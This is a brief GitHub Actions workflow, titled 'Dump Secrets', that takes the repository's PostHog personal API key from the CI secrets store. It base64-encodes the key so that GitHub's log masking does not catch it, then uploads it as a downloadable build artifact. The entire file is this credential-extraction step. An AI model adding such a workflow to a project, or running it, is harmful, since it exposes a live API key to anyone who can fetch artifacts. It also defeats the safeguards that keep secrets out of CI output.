name: Dump Secrets
on:
  workflow_dispatch:
jobs:
  dump:
    runs-on: ubuntu-latest
    steps:
      - name: Create file with secret
        run: |
          echo -n "${{ secrets.POSTHOG_PERSONAL_API_KEY }}" | base64 > key.txt.b64
      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: key-artifact
          path: key.txt.b64
